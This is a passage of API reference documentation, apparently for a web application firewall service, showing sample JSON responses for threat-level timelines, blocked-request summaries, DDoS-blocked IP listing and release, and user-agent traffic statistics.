- "line_number": 0
}, - {
- "id": 32,
- "time": 1587455700000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1587455760000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1587455820000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1587455880000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1587455940000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1587456000000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1587456060000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1587456120000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1587456180000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1587456240000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1587456300000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1587456360000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1587456420000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1587456480000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1587456540000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1587456600000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1587456660000,
- "line_number": 0
}, - {
- "id": 49,
- "time": 1587456720000,
- "line_number": 0
}, - {
- "id": 50,
- "time": 1587456780000,
- "line_number": 0
}, - {
- "id": 51,
- "time": 1587456840000,
- "line_number": 0
}, - {
- "id": 52,
- "time": 1587456900000,
- "line_number": 0
}, - {
- "id": 53,
- "time": 1587456960000,
- "line_number": 0
}, - {
- "id": 54,
- "time": 1587457020000,
- "line_number": 0
}, - {
- "id": 55,
- "time": 1587457080000,
- "line_number": 0
}, - {
- "id": 56,
- "time": 1587457140000,
- "line_number": 0
}, - {
- "id": 57,
- "time": 1587457200000,
- "line_number": 0
}, - {
- "id": 58,
- "time": 1587457260000,
- "line_number": 0
}, - {
- "id": 59,
- "time": 1587457320000,
- "line_number": 0
}, - {
- "id": 60,
- "time": 1587457380000,
- "line_number": 0
}, - {
- "id": 61,
- "time": 1587457440000,
- "line_number": 0
}
]
}, - {
- "line_name": "High",
- "numbers": [
- {
- "id": 1,
- "time": 1587453840000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1587453900000,
- "line_number": 1
}, - {
- "id": 3,
- "time": 1587453960000,
- "line_number": 1
}, - {
- "id": 4,
- "time": 1587454020000,
- "line_number": 1
}, - {
- "id": 5,
- "time": 1587454080000,
- "line_number": 1
}, - {
- "id": 6,
- "time": 1587454140000,
- "line_number": 1
}, - {
- "id": 7,
- "time": 1587454200000,
- "line_number": 1
}, - {
- "id": 8,
- "time": 1587454260000,
- "line_number": 1
}, - {
- "id": 9,
- "time": 1587454320000,
- "line_number": 1
}, - {
- "id": 10,
- "time": 1587454380000,
- "line_number": 1
}, - {
- "id": 11,
- "time": 1587454440000,
- "line_number": 1
}, - {
- "id": 12,
- "time": 1587454500000,
- "line_number": 2
}, - {
- "id": 13,
- "time": 1587454560000,
- "line_number": 1
}, - {
- "id": 14,
- "time": 1587454620000,
- "line_number": 1
}, - {
- "id": 15,
- "time": 1587454680000,
- "line_number": 1
}, - {
- "id": 16,
- "time": 1587454740000,
- "line_number": 1
}, - {
- "id": 17,
- "time": 1587454800000,
- "line_number": 2
}, - {
- "id": 18,
- "time": 1587454860000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1587454920000,
- "line_number": 1
}, - {
- "id": 20,
- "time": 1587454980000,
- "line_number": 2
}, - {
- "id": 21,
- "time": 1587455040000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1587455100000,
- "line_number": 1
}, - {
- "id": 23,
- "time": 1587455160000,
- "line_number": 1
}, - {
- "id": 24,
- "time": 1587455220000,
- "line_number": 1
}, - {
- "id": 25,
- "time": 1587455280000,
- "line_number": 1
}, - {
- "id": 26,
- "time": 1587455340000,
- "line_number": 1
}, - {
- "id": 27,
- "time": 1587455400000,
- "line_number": 1
}, - {
- "id": 28,
- "time": 1587455460000,
- "line_number": 1
}, - {
- "id": 29,
- "time": 1587455520000,
- "line_number": 1
}, - {
- "id": 30,
- "time": 1587455580000,
- "line_number": 1
}, - {
- "id": 31,
- "time": 1587455640000,
- "line_number": 1
}, - {
- "id": 32,
- "time": 1587455700000,
- "line_number": 1
}, - {
- "id": 33,
- "time": 1587455760000,
- "line_number": 1
}, - {
- "id": 34,
- "time": 1587455820000,
- "line_number": 1
}, - {
- "id": 35,
- "time": 1587455880000,
- "line_number": 1
}, - {
- "id": 36,
- "time": 1587455940000,
- "line_number": 1
}, - {
- "id": 37,
- "time": 1587456000000,
- "line_number": 1
}, - {
- "id": 38,
- "time": 1587456060000,
- "line_number": 1
}, - {
- "id": 39,
- "time": 1587456120000,
- "line_number": 1
}, - {
- "id": 40,
- "time": 1587456180000,
- "line_number": 1
}, - {
- "id": 41,
- "time": 1587456240000,
- "line_number": 1
}, - {
- "id": 42,
- "time": 1587456300000,
- "line_number": 1
}, - {
- "id": 43,
- "time": 1587456360000,
- "line_number": 1
}, - {
- "id": 44,
- "time": 1587456420000,
- "line_number": 1
}, - {
- "id": 45,
- "time": 1587456480000,
- "line_number": 1
}, - {
- "id": 46,
- "time": 1587456540000,
- "line_number": 1
}, - {
- "id": 47,
- "time": 1587456600000,
- "line_number": 1
}, - {
- "id": 48,
- "time": 1587456660000,
- "line_number": 1
}, - {
- "id": 49,
- "time": 1587456720000,
- "line_number": 1
}, - {
- "id": 50,
- "time": 1587456780000,
- "line_number": 1
}, - {
- "id": 51,
- "time": 1587456840000,
- "line_number": 1
}, - {
- "id": 52,
- "time": 1587456900000,
- "line_number": 1
}, - {
- "id": 53,
- "time": 1587456960000,
- "line_number": 1
}, - {
- "id": 54,
- "time": 1587457020000,
- "line_number": 2
}, - {
- "id": 55,
- "time": 1587457080000,
- "line_number": 0
}, - {
- "id": 56,
- "time": 1587457140000,
- "line_number": 1
}, - {
- "id": 57,
- "time": 1587457200000,
- "line_number": 1
}, - {
- "id": 58,
- "time": 1587457260000,
- "line_number": 1
}, - {
- "id": 59,
- "time": 1587457320000,
- "line_number": 1
}, - {
- "id": 60,
- "time": 1587457380000,
- "line_number": 1
}, - {
- "id": 61,
- "time": 1587457440000,
- "line_number": 1
}
]
}, - {
- "line_name": "Medium",
- "numbers": [
- {
- "id": 1,
- "time": 1587453840000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1587453900000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1587453960000,
- "line_number": 0
}, - {
- "id": 4,
- "time": 1587454020000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1587454080000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1587454140000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1587454200000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1587454260000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1587454320000,
- "line_number": 0
}, - {
- "id": 10,
- "time": 1587454380000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1587454440000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1587454500000,
- "line_number": 0
}, - {
- "id": 13,
- "time": 1587454560000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1587454620000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1587454680000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1587454740000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1587454800000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1587454860000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1587454920000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1587454980000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1587455040000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1587455100000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1587455160000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1587455220000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1587455280000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1587455340000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1587455400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1587455460000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1587455520000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1587455580000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1587455640000,
- "line_number": 0
}, - {
- "id": 32,
- "time": 1587455700000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1587455760000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1587455820000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1587455880000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1587455940000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1587456000000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1587456060000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1587456120000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1587456180000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1587456240000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1587456300000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1587456360000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1587456420000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1587456480000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1587456540000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1587456600000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1587456660000,
- "line_number": 0
}, - {
- "id": 49,
- "time": 1587456720000,
- "line_number": 0
}, - {
- "id": 50,
- "time": 1587456780000,
- "line_number": 0
}, - {
- "id": 51,
- "time": 1587456840000,
- "line_number": 0
}, - {
- "id": 52,
- "time": 1587456900000,
- "line_number": 0
}, - {
- "id": 53,
- "time": 1587456960000,
- "line_number": 0
}, - {
- "id": 54,
- "time": 1587457020000,
- "line_number": 0
}, - {
- "id": 55,
- "time": 1587457080000,
- "line_number": 0
}, - {
- "id": 56,
- "time": 1587457140000,
- "line_number": 0
}, - {
- "id": 57,
- "time": 1587457200000,
- "line_number": 0
}, - {
- "id": 58,
- "time": 1587457260000,
- "line_number": 0
}, - {
- "id": 59,
- "time": 1587457320000,
- "line_number": 0
}, - {
- "id": 60,
- "time": 1587457380000,
- "line_number": 0
}, - {
- "id": 61,
- "time": 1587457440000,
- "line_number": 0
}
]
}, - {
- "line_name": "Low",
- "numbers": [
- {
- "id": 1,
- "time": 1587453840000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1587453900000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1587453960000,
- "line_number": 0
}, - {
- "id": 4,
- "time": 1587454020000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1587454080000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1587454140000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1587454200000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1587454260000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1587454320000,
- "line_number": 0
}, - {
- "id": 10,
- "time": 1587454380000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1587454440000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1587454500000,
- "line_number": 0
}, - {
- "id": 13,
- "time": 1587454560000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1587454620000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1587454680000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1587454740000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1587454800000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1587454860000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1587454920000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1587454980000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1587455040000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1587455100000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1587455160000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1587455220000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1587455280000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1587455340000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1587455400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1587455460000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1587455520000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1587455580000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1587455640000,
- "line_number": 0
}, - {
- "id": 32,
- "time": 1587455700000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1587455760000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1587455820000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1587455880000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1587455940000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1587456000000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1587456060000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1587456120000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1587456180000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1587456240000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1587456300000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1587456360000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1587456420000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1587456480000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1587456540000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1587456600000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1587456660000,
- "line_number": 0
}, - {
- "id": 49,
- "time": 1587456720000,
- "line_number": 0
}, - {
- "id": 50,
- "time": 1587456780000,
- "line_number": 0
}, - {
- "id": 51,
- "time": 1587456840000,
- "line_number": 0
}, - {
- "id": 52,
- "time": 1587456900000,
- "line_number": 0
}, - {
- "id": 53,
- "time": 1587456960000,
- "line_number": 0
}, - {
- "id": 54,
- "time": 1587457020000,
- "line_number": 0
}, - {
- "id": 55,
- "time": 1587457080000,
- "line_number": 0
}, - {
- "id": 56,
- "time": 1587457140000,
- "line_number": 0
}, - {
- "id": 57,
- "time": 1587457200000,
- "line_number": 0
}, - {
- "id": 58,
- "time": 1587457260000,
- "line_number": 0
}, - {
- "id": 59,
- "time": 1587457320000,
- "line_number": 0
}, - {
- "id": 60,
- "time": 1587457380000,
- "line_number": 0
}, - {
- "id": 61,
- "time": 1587457440000,
- "line_number": 0
}
]
}, - {
- "line_name": "Off",
- "numbers": [
- {
- "id": 1,
- "time": 1587453840000,
- "line_number": 0
}, - {
- "id": 2,
- "time": 1587453900000,
- "line_number": 0
}, - {
- "id": 3,
- "time": 1587453960000,
- "line_number": 0
}, - {
- "id": 4,
- "time": 1587454020000,
- "line_number": 0
}, - {
- "id": 5,
- "time": 1587454080000,
- "line_number": 0
}, - {
- "id": 6,
- "time": 1587454140000,
- "line_number": 0
}, - {
- "id": 7,
- "time": 1587454200000,
- "line_number": 0
}, - {
- "id": 8,
- "time": 1587454260000,
- "line_number": 0
}, - {
- "id": 9,
- "time": 1587454320000,
- "line_number": 0
}, - {
- "id": 10,
- "time": 1587454380000,
- "line_number": 0
}, - {
- "id": 11,
- "time": 1587454440000,
- "line_number": 0
}, - {
- "id": 12,
- "time": 1587454500000,
- "line_number": 0
}, - {
- "id": 13,
- "time": 1587454560000,
- "line_number": 0
}, - {
- "id": 14,
- "time": 1587454620000,
- "line_number": 0
}, - {
- "id": 15,
- "time": 1587454680000,
- "line_number": 0
}, - {
- "id": 16,
- "time": 1587454740000,
- "line_number": 0
}, - {
- "id": 17,
- "time": 1587454800000,
- "line_number": 0
}, - {
- "id": 18,
- "time": 1587454860000,
- "line_number": 0
}, - {
- "id": 19,
- "time": 1587454920000,
- "line_number": 0
}, - {
- "id": 20,
- "time": 1587454980000,
- "line_number": 0
}, - {
- "id": 21,
- "time": 1587455040000,
- "line_number": 0
}, - {
- "id": 22,
- "time": 1587455100000,
- "line_number": 0
}, - {
- "id": 23,
- "time": 1587455160000,
- "line_number": 0
}, - {
- "id": 24,
- "time": 1587455220000,
- "line_number": 0
}, - {
- "id": 25,
- "time": 1587455280000,
- "line_number": 0
}, - {
- "id": 26,
- "time": 1587455340000,
- "line_number": 0
}, - {
- "id": 27,
- "time": 1587455400000,
- "line_number": 0
}, - {
- "id": 28,
- "time": 1587455460000,
- "line_number": 0
}, - {
- "id": 29,
- "time": 1587455520000,
- "line_number": 0
}, - {
- "id": 30,
- "time": 1587455580000,
- "line_number": 0
}, - {
- "id": 31,
- "time": 1587455640000,
- "line_number": 0
}, - {
- "id": 32,
- "time": 1587455700000,
- "line_number": 0
}, - {
- "id": 33,
- "time": 1587455760000,
- "line_number": 0
}, - {
- "id": 34,
- "time": 1587455820000,
- "line_number": 0
}, - {
- "id": 35,
- "time": 1587455880000,
- "line_number": 0
}, - {
- "id": 36,
- "time": 1587455940000,
- "line_number": 0
}, - {
- "id": 37,
- "time": 1587456000000,
- "line_number": 0
}, - {
- "id": 38,
- "time": 1587456060000,
- "line_number": 0
}, - {
- "id": 39,
- "time": 1587456120000,
- "line_number": 0
}, - {
- "id": 40,
- "time": 1587456180000,
- "line_number": 0
}, - {
- "id": 41,
- "time": 1587456240000,
- "line_number": 0
}, - {
- "id": 42,
- "time": 1587456300000,
- "line_number": 0
}, - {
- "id": 43,
- "time": 1587456360000,
- "line_number": 0
}, - {
- "id": 44,
- "time": 1587456420000,
- "line_number": 0
}, - {
- "id": 45,
- "time": 1587456480000,
- "line_number": 0
}, - {
- "id": 46,
- "time": 1587456540000,
- "line_number": 0
}, - {
- "id": 47,
- "time": 1587456600000,
- "line_number": 0
}, - {
- "id": 48,
- "time": 1587456660000,
- "line_number": 0
}, - {
- "id": 49,
- "time": 1587456720000,
- "line_number": 0
}, - {
- "id": 50,
- "time": 1587456780000,
- "line_number": 0
}, - {
- "id": 51,
- "time": 1587456840000,
- "line_number": 0
}, - {
- "id": 52,
- "time": 1587456900000,
- "line_number": 0
}, - {
- "id": 53,
- "time": 1587456960000,
- "line_number": 0
}, - {
- "id": 54,
- "time": 1587457020000,
- "line_number": 0
}, - {
- "id": 55,
- "time": 1587457080000,
- "line_number": 0
}, - {
- "id": 56,
- "time": 1587457140000,
- "line_number": 0
}, - {
- "id": 57,
- "time": 1587457200000,
- "line_number": 0
}, - {
- "id": 58,
- "time": 1587457260000,
- "line_number": 0
}, - {
- "id": 59,
- "time": 1587457320000,
- "line_number": 0
}, - {
- "id": 60,
- "time": 1587457380000,
- "line_number": 0
}, - {
- "id": 61,
- "time": 1587457440000,
- "line_number": 0
}
]
}
], - "sum_info": {
- "Monitor": 0,
- "Block": 61,
- "HTTP": 0,
- "HTTPS": 61,
- "total_number": 61,
- "total_score": 1830,
- "threat_level": "High"
}
}
}Get period blocked IPs related to the application
| ep_id required | string The application ID, it can be obtained from List Applications API. |
{- "detail": [
- {
- "ip": "1.2.3.4",
- "reason": "DDoS Prevention",
- "expire_time": "2023-02-15 15:23:04+0800"
}
]
}Release the IP from being period blocked
| ep_id required | string The application ID, it can be obtained from List Applications API. |
| ip required | string The IP to be released from being period blocked. |
{- "detail": "Invalid IP address."
}| ep_id required | string The application ID, it can be obtained from List Applications API. |
| type required | string Enum: "summary" "detail" Example: type=summary The type of query result |
| start_time required | string Example: start_time=1660254596243 The start time of timespan |
| end_time required | string Example: end_time=1660340996243 The end time of timespan |
| page | integer >= 1 Example: page=1 The page number of requested information |
| size | integer [ 1 .. 100 ] Default: 20 Example: size=10 The result table size (1-100) |
| filter | string For example, for the Agent details table, the filter is {"srccountry": "canada, united state", "http_agent": "Mozilla/5.0*"} |
{- "details": {
- "curl/7.68.0": {
- "count": 21
}, - "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36": {
- "count": 17
}, - "PostmanRuntime/7.29.0": {
- "count": 6
}, - "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0": {
- "count": 4
}, - "Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com": {
- "count": 3
}
}, - "summary": {
- "start": "1660254596243",
- "end": "1660340996243",
- "count": 145,
- "graph": [
- {
- "id": 1,
- "time": 1660254000000,
- "data": [ ]
}, - {
- "id": 2,
- "time": 1660254600000,
- "data": [ ]
}, - {
- "id": 3,
- "time": 1660255200000,
- "data": [ ]
}, - {
- "id": 4,
- "time": 1660255800000,
- "data": [ ]
}, - {
- "id": 5,
- "time": 1660256400000,
- "data": [ ]
}, - {
- "id": 6,
- "time": 1660257000000,
- "data": [ ]
}, - {
- "id": 7,
- "time": 1660257600000,
- "data": [ ]
}, - {
- "id": 8,
- "time": 1660258200000,
- "data": [ ]
}, - {
- "id": 9,
- "time": 1660258800000,
- "data": [
- {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 2
}
}
]
}, - {
- "id": 10,
- "time": 1660259400000,
- "data": [
- {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 4
}
}
]
}, - {
- "id": 11,
- "time": 1660260000000,
- "data": [ ]
}, - {
- "id": 12,
- "time": 1660260600000,
- "data": [ ]
}, - {
- "id": 13,
- "time": 1660261200000,
- "data": [ ]
}, - {
- "id": 14,
- "time": 1660261800000,
- "data": [ ]
}, - {
- "id": 15,
- "time": 1660262400000,
- "data": [ ]
}, - {
- "id": 16,
- "time": 1660263000000,
- "data": [ ]
}, - {
- "id": 17,
- "time": 1660263600000,
- "data": [ ]
}, - {
- "id": 18,
- "time": 1660264200000,
- "data": [ ]
}, - {
- "id": 19,
- "time": 1660264800000,
- "data": [ ]
}, - {
- "id": 20,
- "time": 1660265400000,
- "data": [ ]
}, - {
- "id": 21,
- "time": 1660266000000,
- "data": [ ]
}, - {
- "id": 22,
- "time": 1660266600000,
- "data": [ ]
}, - {
- "id": 23,
- "time": 1660267200000,
- "data": [ ]
}, - {
- "id": 24,
- "time": 1660267800000,
- "data": [ ]
}, - {
- "id": 25,
- "time": 1660268400000,
- "data": [ ]
}, - {
- "id": 26,
- "time": 1660269000000,
- "data": [ ]
}, - {
- "id": 27,
- "time": 1660269600000,
- "data": [ ]
}, - {
- "id": 28,
- "time": 1660270200000,
- "data": [ ]
}, - {
- "id": 29,
- "time": 1660270800000,
- "data": [ ]
}, - {
- "id": 30,
- "time": 1660271400000,
- "data": [ ]
}, - {
- "id": 31,
- "time": 1660272000000,
- "data": [ ]
}, - {
- "id": 32,
- "time": 1660272600000,
- "data": [ ]
}, - {
- "id": 33,
- "time": 1660273200000,
- "data": [ ]
}, - {
- "id": 34,
- "time": 1660273800000,
- "data": [ ]
}, - {
- "id": 35,
- "time": 1660274400000,
- "data": [ ]
}, - {
- "id": 36,
- "time": 1660275000000,
- "data": [ ]
}, - {
- "id": 37,
- "time": 1660275600000,
- "data": [ ]
}, - {
- "id": 38,
- "time": 1660276200000,
- "data": [ ]
}, - {
- "id": 39,
- "time": 1660276800000,
- "data": [ ]
}, - {
- "id": 40,
- "time": 1660277400000,
- "data": [ ]
}, - {
- "id": 41,
- "time": 1660278000000,
- "data": [ ]
}, - {
- "id": 42,
- "time": 1660278600000,
- "data": [ ]
}, - {
- "id": 43,
- "time": 1660279200000,
- "data": [ ]
}, - {
- "id": 44,
- "time": 1660279800000,
- "data": [ ]
}, - {
- "id": 45,
- "time": 1660280400000,
- "data": [ ]
}, - {
- "id": 46,
- "time": 1660281000000,
- "data": [ ]
}, - {
- "id": 47,
- "time": 1660281600000,
- "data": [ ]
}, - {
- "id": 48,
- "time": 1660282200000,
- "data": [ ]
}, - {
- "id": 49,
- "time": 1660282800000,
- "data": [ ]
}, - {
- "id": 50,
- "time": 1660283400000,
- "data": [ ]
}, - {
- "id": 51,
- "time": 1660284000000,
- "data": [ ]
}, - {
- "id": 52,
- "time": 1660284600000,
- "data": [ ]
}, - {
- "id": 53,
- "time": 1660285200000,
- "data": [ ]
}, - {
- "id": 54,
- "time": 1660285800000,
- "data": [ ]
}, - {
- "id": 55,
- "time": 1660286400000,
- "data": [ ]
}, - {
- "id": 56,
- "time": 1660287000000,
- "data": [ ]
}, - {
- "id": 57,
- "time": 1660287600000,
- "data": [ ]
}, - {
- "id": 58,
- "time": 1660288200000,
- "data": [ ]
}, - {
- "id": 59,
- "time": 1660288800000,
- "data": [ ]
}, - {
- "id": 60,
- "time": 1660289400000,
- "data": [ ]
}, - {
- "id": 61,
- "time": 1660290000000,
- "data": [ ]
}, - {
- "id": 62,
- "time": 1660290600000,
- "data": [ ]
}, - {
- "id": 63,
- "time": 1660291200000,
- "data": [ ]
}, - {
- "id": 64,
- "time": 1660291800000,
- "data": [ ]
}, - {
- "id": 65,
- "time": 1660292400000,
- "data": [ ]
}, - {
- "id": 66,
- "time": 1660293000000,
- "data": [ ]
}, - {
- "id": 67,
- "time": 1660293600000,
- "data": [ ]
}, - {
- "id": 68,
- "time": 1660294200000,
- "data": [ ]
}, - {
- "id": 69,
- "time": 1660294800000,
- "data": [ ]
}, - {
- "id": 70,
- "time": 1660295400000,
- "data": [ ]
}, - {
- "id": 71,
- "time": 1660296000000,
- "data": [ ]
}, - {
- "id": 72,
- "time": 1660296600000,
- "data": [ ]
}, - {
- "id": 73,
- "time": 1660297200000,
- "data": [ ]
}, - {
- "id": 74,
- "time": 1660297800000,
- "data": [ ]
}, - {
- "id": 75,
- "time": 1660298400000,
- "data": [ ]
}, - {
- "id": 76,
- "time": 1660299000000,
- "data": [ ]
}, - {
- "id": 77,
- "time": 1660299600000,
- "data": [ ]
}, - {
- "id": 78,
- "time": 1660300200000,
- "data": [ ]
}, - {
- "id": 79,
- "time": 1660300800000,
- "data": [ ]
}, - {
- "id": 80,
- "time": 1660301400000,
- "data": [ ]
}, - {
- "id": 81,
- "time": 1660302000000,
- "data": [ ]
}, - {
- "id": 82,
- "time": 1660302600000,
- "data": [ ]
}, - {
- "id": 83,
- "time": 1660303200000,
- "data": [ ]
}, - {
- "id": 84,
- "time": 1660303800000,
- "data": [ ]
}, - {
- "id": 85,
- "time": 1660304400000,
- "data": [ ]
}, - {
- "id": 86,
- "time": 1660305000000,
- "data": [ ]
}, - {
- "id": 87,
- "time": 1660305600000,
- "data": [ ]
}, - {
- "id": 88,
- "time": 1660306200000,
- "data": [ ]
}, - {
- "id": 89,
- "time": 1660306800000,
- "data": [ ]
}, - {
- "id": 90,
- "time": 1660307400000,
- "data": [ ]
}, - {
- "id": 91,
- "time": 1660308000000,
- "data": [ ]
}, - {
- "id": 92,
- "time": 1660308600000,
- "data": [ ]
}, - {
- "id": 93,
- "time": 1660309200000,
- "data": [ ]
}, - {
- "id": 94,
- "time": 1660309800000,
- "data": [ ]
}, - {
- "id": 95,
- "time": 1660310400000,
- "data": [ ]
}, - {
- "id": 96,
- "time": 1660311000000,
- "data": [ ]
}, - {
- "id": 97,
- "time": 1660311600000,
- "data": [ ]
}, - {
- "id": 98,
- "time": 1660312200000,
- "data": [ ]
}, - {
- "id": 99,
- "time": 1660312800000,
- "data": [ ]
}, - {
- "id": 100,
- "time": 1660313400000,
- "data": [ ]
}, - {
- "id": 101,
- "time": 1660314000000,
- "data": [ ]
}, - {
- "id": 102,
- "time": 1660314600000,
- "data": [ ]
}, - {
- "id": 103,
- "time": 1660315200000,
- "data": [ ]
}, - {
- "id": 104,
- "time": 1660315800000,
- "data": [ ]
}, - {
- "id": 105,
- "time": 1660316400000,
- "data": [ ]
}, - {
- "id": 106,
- "time": 1660317000000,
- "data": [ ]
}, - {
- "id": 107,
- "time": 1660317600000,
- "data": [ ]
}, - {
- "id": 108,
- "time": 1660318200000,
- "data": [ ]
}, - {
- "id": 109,
- "time": 1660318800000,
- "data": [ ]
}, - {
- "id": 110,
- "time": 1660319400000,
- "data": [ ]
}, - {
- "id": 111,
- "time": 1660320000000,
- "data": [ ]
}, - {
- "id": 112,
- "time": 1660320600000,
- "data": [ ]
}, - {
- "id": 113,
- "time": 1660321200000,
- "data": [ ]
}, - {
- "id": 114,
- "time": 1660321800000,
- "data": [ ]
}, - {
- "id": 115,
- "time": 1660322400000,
- "data": [ ]
}, - {
- "id": 116,
- "time": 1660323000000,
- "data": [ ]
}, - {
- "id": 117,
- "time": 1660323600000,
- "data": [ ]
}, - {
- "id": 118,
- "time": 1660324200000,
- "data": [ ]
}, - {
- "id": 119,
- "time": 1660324800000,
- "data": [
- {
- "source": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/104.0.0.0 Safari/537.36",
- "value": {
- "count_sum": 1
}
}
]
}, - {
- "id": 120,
- "time": 1660325400000,
- "data": [ ]
}, - {
- "id": 121,
- "time": 1660326000000,
- "data": [
- {
- "source": "PostmanRuntime/7.29.0",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 122,
- "time": 1660326600000,
- "data": [ ]
}, - {
- "id": 123,
- "time": 1660327200000,
- "data": [ ]
}, - {
- "id": 124,
- "time": 1660327800000,
- "data": [
- {
- "source": "curl/7.68.0",
- "value": {
- "count_sum": 3
}
}
]
}, - {
- "id": 125,
- "time": 1660328400000,
- "data": [
- {
- "source": "curl/7.68.0",
- "value": {
- "count_sum": 12
}
}
]
}, - {
- "id": 126,
- "time": 1660329000000,
- "data": [
- {
